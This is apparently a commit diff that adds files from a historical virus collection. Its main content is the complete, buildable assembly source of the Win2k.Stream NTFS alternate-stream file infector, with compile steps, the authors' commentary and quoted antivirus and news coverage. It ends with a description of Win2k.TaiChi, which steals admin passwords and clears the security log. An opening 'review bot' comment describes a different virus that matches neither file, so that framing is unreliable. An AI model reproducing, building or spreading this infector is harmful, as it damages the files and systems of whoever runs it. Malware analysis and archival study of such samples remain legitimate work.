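Review bot: Like the Joss file earlier in this commit, the artefacts this sample leaves on an infected file are undocumented, and they differ from Joss in ways a reader comparing the two should be told: the body is written over the base-relocation section, which must be the last section (`cmp eax,[edi.SH_VirtualAddress]` against `DE_BaseReloc.DD_VirtualAddress`, then `rep movsd ;overwrite relocs by virus body`), the relocation data-directory entry is zeroed (`stosd` / `stosd` before `popad ;erase relocs record`), that section gets `IMAGE_SCN_MEM_WRITE` or'ed into `SH_Characteristics`, and the entry point is set to its `SH_VirtualAddress`. There is no explicit infection marker; what stops re-infection is the zeroed directory entry failing `test eax,eax` / `je if_end4`, and the comment block at the top, which says nothing about re-infection, should state that. The fixed ASCII tag is the `signature` string `'WinNT.Ketamine by Benny/29A'`, and `mov esi,77F80000h ;base of NTDLL.dll` ties the sample to one ntdll load address despite the preamble's forward-compatibility claim, which is worth noting next to that claim.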
+634
@@ -0,0 +1,634 @@
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Win2k.Stream ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A and Ratter ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Let us introduce very small and simple infector presenting how to use features
of NTFS in viruses. This virus loox like standard Petite-compressed PE file.
However, it presents the newest way of PE file infecting method.
How the virus worx? It uses streamz, the newest feature of NTFS filesystem
and file compression, already implemented in old NTFS fs.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Basic principles of NTFS streamz ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
How the file loox? Ya know that the file contains exactly the same what you can
see when you will open it (e.g. in WinCommander). NTFS, implemented by
Windows 2000, has new feature - the file can be divided to streamz. The content
what you can see when you will open the file is called Primary stream - usually
files haven't more than one stream. However, you can create NEW stream ( = new
content) in already existing file without overwritting the content.
Example:
addressing of primary stream -> <filename> e.g. "calc.exe"
addressing of other streamz -> <filename>:<stream name> e.g. "calc.exe:stream"
If you have NTFS, you can test it. Copy to NTFS for instance "calc.exe", and
then create new file "calc.exe:stream" and write there "blahblah". Open
"calc.exe". Whats there? Calculator ofcoz. Now open "calc.exe:stream". Whats
there? "blahblah", the new file in the old one :)
Can you imagine how useful r streamz for virus coding?
The virus infects file by moving the old content to the new stream and replacing
the primary stream with virus code.
File (calc.exe) before infection:
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (visible part)Ä¿º
º³ Calculator ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
File (calc.exe) after infection:
ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄPrimary stream (calc.exe)Ä¿ÚÄNext stream (calc.exe:STR)Ä¿ º
º³ Virus ³³ Calculator ³ º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Simple and efficent, ain't it?
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Details of virus ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
* The virus infects all EXE files in actual directory.
* The virus uses as already-infected mark file compression. All infected
files are compressed by NTFS and virus then does not infect already
compressed files. Well, almost all files after infection r smaller than
before, so user won't recognize virus by checking free disk space :)
* If user will copy the infected file to non-NTFS partition (in this case
only primary stream is copied), the host program will be destroyed and
instead of running host program virus will show message box. That can
be also called as payload :P
* The virus is very small, exactly 3628 bytes, becoz it's compressed by
Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/).
* The disinfection is very easy - just copy the content of <file>:STR to
<file> and delete <file>:STR. If you want to create sample of infected
file, then just copy the virus to some file and copy any program (host
program) to <file>:STR. Thats all! However, AVerz have to rebuild their
search engine to remove this virus, becoz until now, they had no fucking
idea what are streamz :)
* This virus was coded in Czech Republic by Benny/29A and Ratter, on our
common VX meeting at Ratter's city... we just coded it to show that
Windows 2000 is just another OS designed for viruses... it really is :)
* We would like to thank GriYo for pointing us to NTFS new features.
The fame is also yourz, friend!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ In the media ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
AVP's description:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is the first known Windows virus using the "stream companion" infection
method. That method is based on an NTFS feature that allows to create multiple
data streams associated with a file.
*NTFS Streams*
---------------
Each file contains at least one default data stream that is accessed just by
the file name. Each file may also contain additional stream(s) that can be
accessed by their personal names (filename:streamname).
The default file stream is the file body itself (in pre-NTFS terms). For
instance, when an EXE file is executed the program is read from the default
file stream; when a document is opened, its content is also read from the
default stream.
Additional file streams may contain any data. The streams cannot be accessed or
modified without reference to the file. When the file is deleted, its streams
are deleted as well; if the file is renamed, the streams follow its new name.
In the Windows package there is no standard tool to view/edit file streams. To
"manually" view file streams you need to use special utilities, for instance
the FAR utility with the file steams support plug-in (Ctrl-PgDn displays file
streams for selected file).
*Virus Details*
----------------
The virus itself is a Windows application (PE EXE file) compressed using the
Petite PE EXE file compressor and is about 4K in size. When run it infects all
EXE files in the current directory and then returns control to the host file.
If any error occurs, the virus displays the message:
Win2k.Stream by Benny/29A & Ratter
This cell has been infected by [Win2k.Stream] virus!
While infecting a file the virus creates a new stream associated with the victim
file. That stream has the name "STR", i.e. the complete stream name is
"FileName:STR". The virus then moves the victim file body to the STR stream
(default stream, see above) and then overwrites the victim file body (default
stream) with its (virus) code.
As a result, when an infected file is executed Windows reads the default stream
(which is overwritten by virus code) and executes it. Also, Windows reports the
same file size for all infected files - that is the virus length.
To release control to the host program the virus just creates a new process by
accessing the original file program using the name "FileName:STR".
That infection method should work on any NTFS system, but the virus checks the
system version and runs only under Win2000.
AVP's press release:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
*A New Generation of Windows 2000 Viruses is Streaming Towards PC Users*
------------------------------------------------------------------------
Moscow, Russia, September 4, 2000 Kaspersky Lab announces the discovery of
W2K.Stream virus, which represents a new generation of malicious programs for
Windows 2000. This virus uses a new breakthrough technology based on the
"Stream Companion" method for self-embedding into the NTFS file system.
The virus originates from the Czech Republic and was created at the end of
August by the hackers going by the pseudonyms of Benny and Ratter. To date,
Kaspersky Lab has not registered any infections resulting from this virus;
however, its working capacity and ability for existence "in-the-wild" are
unchallenged.
"Certainly, this virus begins a new era in computer virus creation," said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The Stream
Companion technology the virus uses to plant itself into files makes its
detection and disinfection extremely difficult to complete.
Unlike previously known methods of file infection (adding the virus body at
beginning, ending or any other part of a host file), the "Stream" virus
exploits the NTFS file system (Windows NT/2000) feature, which allows multiple
data streams. For instance, in Windows 95/98 (FAT) files, there is only one
data stream the program code itself. Windows NT/2000 (NTFS) enables users
to create any number of data streams within the file: independent executable
program modules, as well as various service streams (file access rights,
encryption data, processing time etc.). This makes NTFS files very flexible,
allowing for the creation of user-defined data streams aimed at completing
specific tasks.
"Stream" is the first known virus that uses the feature of creating multiple
data streams for infecting files of the NTFS file system (see picture 1). To
complete this, the virus creates an additional data stream named "STR" and
moves the original content of the host program there. Then, it replaces the
main data stream with the virus code. As a result, when the infected program
is run, the virus takes control, completes the replicating procedure and then
passes control to the host program.
*"Stream" file infection procedure*
------------------------------------
File before infection File after infection
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°program body°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
"By default, anti-virus programs check only the main data stream. There will be
no problems protecting users from this particular virus," Eugene Kaspersky
continues. "However, the viruses can move to additional data streams. In this
case, many anti-virus products will become obsolete, and their vendors will be
forced to urgently redesign their anti-virus engines."
In MSNBC's news:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
*New trick can hide computer viruses*
*But experts question danger posed by Stream technology*
-----------------------------------------------------------
Sept. 6 A new kind of computer virus has been released, but security experts
are in disagreement over just how menacing it is. The virus demonstrates a
technique that future writers can use to hide their malicious software from
most current antivirus scanners. But some antivirus companies are playing down
the threat.
THE VIRUS, CALLED W2K.STREAM, poses little threat it was written as a
relatively benign proof of concept. But, according to a source who requested
anonymity, it was posted on several virus writer Web sites over Labor Day
weekend making copycats possible.
The virus takes advantage of a little-used feature included in Windows 2000 and
older Windows NT systems that allows programs to be split into pieces called
streams. Generally, the body of a program resides in the main stream. But other
streams can be created to store information related to whats in the main
stream. Joel Scambray, author of Hacking Exposed, described these additional
streams as Post-it notes attached to the main file.
The problem is that antivirus programs only examine the main stream. W2K.Stream
demonstrates a programmers ability to create an additional stream and hide
malicious code there.
Certainly, this virus begins a new era in computer virus creation, said
Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press
release. The Stream Companion technology the virus uses to plant itself into
files makes its detection and disinfection extremely difficult to complete.
*THIS BUG ISNT DANGEROUS*
---------------------------
No W2K.stream infections have been reported, and experts dont believe the
virus is in the wild circulating on the Internet yet. At any rate, this
virus actually makes things easy for antivirus companies. If a user is
infected, the program creates an alternate stream and places the legitimate
file in this alternate location; the virus replaces it as the main stream. That
makes detection by current antivirus products easy. But future viruses could
do just the opposite, evading current antivirus products.
One antivirus researcher who requested anonymity called release of the bug
somewhat akin to the first macro virus. He added that reengineering antivirus
software to scan for multiple streams would be a complicated effort.
In this case, many anti-virus products will become obsolete, and their vendors
will be forced to urgently redesign their anti-virus engines, Kaspersky said.
*AN OLD ISSUE*
---------------
There is nothing new about the potential of exploiting the multiple stream
issue; Scambray hints at the problem in the book “Hacking Exposed,” and
described it even more explicitly in a 1998 Infoworld.com article.
The SANS Institute, a group of security researchers, issued an alert
criticizing antivirus companies for not updating their products to scan the
contents of any file stream earlier.
We found that the scanners were incapable of identifying viruses stored within
an alternate data stream, the report said. For example if you create the file
MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within
the alternate data stream file, none of the tested virus scanners were capable
of finding the virus during a complete disk scan.
But some antivirus companies described the threat as minimal because the
alternate stream trick only hides the bug while its stored on a victims
computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp.,
said for the virus to actually run, it has to come out of hiding and load into
main memory.
It would be detected as it tried to activate, Palomaki said. But this
signifies importance of real-time protection. He added the virus would still
have to find its way onto a victims computer; and that victim would have to
be tricked into installing the virus using one of the traditional methods,
such as clicking on an infected e-mail attachment.
It could increase the ability to for scanners to miss something, said Pat
Nolan, virus researcher at McAfee Corp. But were on top of it. If there is
a vulnerability, it will be short-lived.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ How to compile it? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/).
tasm32 /ml /m9 /q stream
tlink32 -Tpe -c -x -aa stream,,,import32
pewrsec stream.exe
petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe
And here comes the virus source...
#
.586p
.model flat,stdcall
include win32api.inc ;include filez
include useful.inc
extrn ExitProcess:PROC ;used APIz
extrn VirtualFree:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn WinExec:PROC
extrn GetCommandLineA:PROC
extrn GetModuleFileNameA:PROC
extrn DeleteFileA:PROC
extrn ReadFile:PROC
extrn CopyFileA:PROC
extrn WriteFile:PROC
extrn CreateFileA:PROC
extrn CloseHandle:PROC
extrn MessageBoxA:PROC
extrn GetFileSize:PROC
extrn VirtualAlloc:PROC
extrn DeviceIoControl:PROC
extrn GetFileAttributesA:PROC
extrn GetTempFileNameA:PROC
extrn CreateProcessA:PROC
extrn GetVersion:PROC
FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2
;compression flag
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
@pushvar macro variable, empty ;macro for pushing variablez
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
.data
extExe db '*.exe',0 ;search mask
fHandle dd ? ;file search handle
file_name db MAX_PATH dup(?) ;actual program name
db MAX_PATH dup(?)
file_name2 db MAX_PATH dup(?) ;temprorary file
db 4 dup (?)
WFD WIN32_FIND_DATA ? ;win32 find data
proc_info PROCESS_INFORMATION <> ;used by CreateProcessA
startup_info STARTUPINFO <> ;...
.code
Start: ;start of virus
call GetVersion ;get OS version
cmp al,5 ;5 = Win2000
jnz msgBox ;quit if not Win2000
mov edi,offset file_name
push MAX_PATH
push edi
push 0
call GetModuleFileNameA ;get path+filename of actual
;program
push offset WFD
push offset extExe
call FindFirstFileA ;find first file to infect
test eax,eax
jz end_host
mov [fHandle],eax ;save handle
search_loop:
call infect ;try to infect file
push offset WFD
push dword ptr [fHandle]
call FindNextFileA ;try to find next file
test eax,eax
jne search_loop ;and infect it
push dword ptr [fHandle]
call FindClose ;close file search handle
end_host:
mov esi,offset file_name ;get our filename
push esi
@endsz
dec esi
mov edi,esi
mov eax,"RTS:" ;append there :"STR" stream
stosd ;name
pop esi
call GetCommandLineA ;get command line
xchg eax,edi ;to EDI
;esi - app name
;edi - cmd line
xor eax,eax
push offset proc_info
push offset startup_info
push eax
push eax
push eax
push eax
push eax
push eax
push edi
push esi
call CreateProcessA ;jump to host code
xchg eax,ecx
jecxz msgBox ;if error, show message box
end_app:
push 0
call ExitProcess ;exit
msgBox: push 1000h ;show some lame msg box :)
@pushsz "Win2k.Stream by Benny/29A & Ratter" ;copyleft :]
@pushsz "This cell has been infected by [Win2k.Stream] virus!"
push 0 ;with name of virus and authorz
call MessageBoxA
jmp end_app
infect: push offset [WFD.WFD_szFileName]
call GetFileAttributesA ;check if the file is NTFS
test eax,800h ;compressed = already infected
jz next_infect
ret ;quit then
next_infect:
push offset [WFD.WFD_szFileName]
mov byte ptr [flagz],OPEN_EXISTING
call Create_File ;open found program
jz infect_end
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)
push ebx
call CloseHandle ;close file handle
mov esi,offset file_name2
push esi
push 0
@pushsz "str"
@pushsz "."
call GetTempFileNameA ;create name for temp file
test eax,eax
jz infect_end
mov edi,offset [WFD.WFD_szFileName]
push 0
push esi
push edi
call CopyFileA ;copy there victim program
test eax,eax
jz infect_end
push 0
push edi
push offset file_name
call CopyFileA ;copy ourself to victim program
push esi
mov esi,edi
@endsz
xchg esi,edi
dec edi
mov eax,"RTS:" ;append :"STR" stream to
stosd ;victim program filename
xor al,al
stosb
call Create_File ;open victim file
jz infect_end
push 0
push ebx
call GetFileSize ;get its size
xchg eax,edi
push PAGE_READWRITE
push MEM_COMMIT or MEM_RESERVE
push edi
push 0
call VirtualAlloc ;allocate enough memory
test eax,eax ;for file content
jz infect_end_handle
xchg eax,esi
xor eax,eax
push eax
@pushvar <file_size dd ?>
push edi
push esi
push ebx
call ReadFile ;read file content to
test eax,eax ;allocated memory
jz infect_end_handle
push ebx
call CloseHandle ;close its file handle
push offset file_name2
call DeleteFileA ;delete temporary file
mov byte ptr [flagz],CREATE_ALWAYS
push offset [WFD.WFD_szFileName]
call Create_File ;open stream
jz infect_end_dealloc
push 0
mov ecx,offset file_size
push ecx
push dword ptr [ecx]
push esi
push ebx
call WriteFile ;write there victim program
test eax,eax
jz infect_end_handle
infect_end_handle:
push ebx
call CloseHandle ;close its file handle
infect_end_dealloc:
push MEM_DECOMMIT
push dword ptr [file_size]
push esi
call VirtualFree ;free allocated memory
push MEM_RELEASE
push 0
push esi
call VirtualFree ;release reserved part of mem
infect_end:
ret
; [esp+4] - file_name
Create_File: ;proc for opening file
xor eax,eax
push eax
push eax
db 6ah
flagz db OPEN_EXISTING ;variable file open flag
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push dword ptr [esp+1ch]
call CreateFileA ;open file
xchg eax,ebx ;handle to EBX
inc ebx ;is EBX -1?
lahf ;store flags
dec ebx ;correct EBX
sahf ;restore flags
retn 4 ;quit from proc
end Start ;end of virus
+31
@@ -0,0 +1,31 @@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Description.TXT]ÄÄÄ
Win2k.TaiChi by Ratter/29A release #1
This virus has some special features which I would like to list here:
- getting kenel base from PEB
- infecting winlogon via which it disables SFP, captures admins
passwords and later uses them when logged in as normal user to
impersonate admin and working under admin privileges
- once runned as admin adds needed privileges to Everyone
- disables auditing, clears security event log
- uses its own routines for infecting PE exe files on NTFS volumes
(ie it accesses NTFS structures to locate and access the file,
bypassing security and via this you can even modify files that are
normally unmodifiable)
- for this it uses emulation of memory mapped files using SEH
- because a proof of concept virus it infects one file in directory
- everything prepared for using procedure encryption and running length
encryption using SEH (routine seh_decode) however not used in this version
- it has a payload: installs own bootvid.dll which disables security (via
SeAccessCheck patching) via patching the NT kernel runtime and displays
29A logo while booting Windows
Todo:
- emulation engine
- add procedure encryption and running line encryption
- more heavily testing under WinXP and possibly adapting
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Description.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Editor]ÄÄÄ
Due the complexity of the source, it has been placed in Binaries folder.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[Editor]ÄÄÄ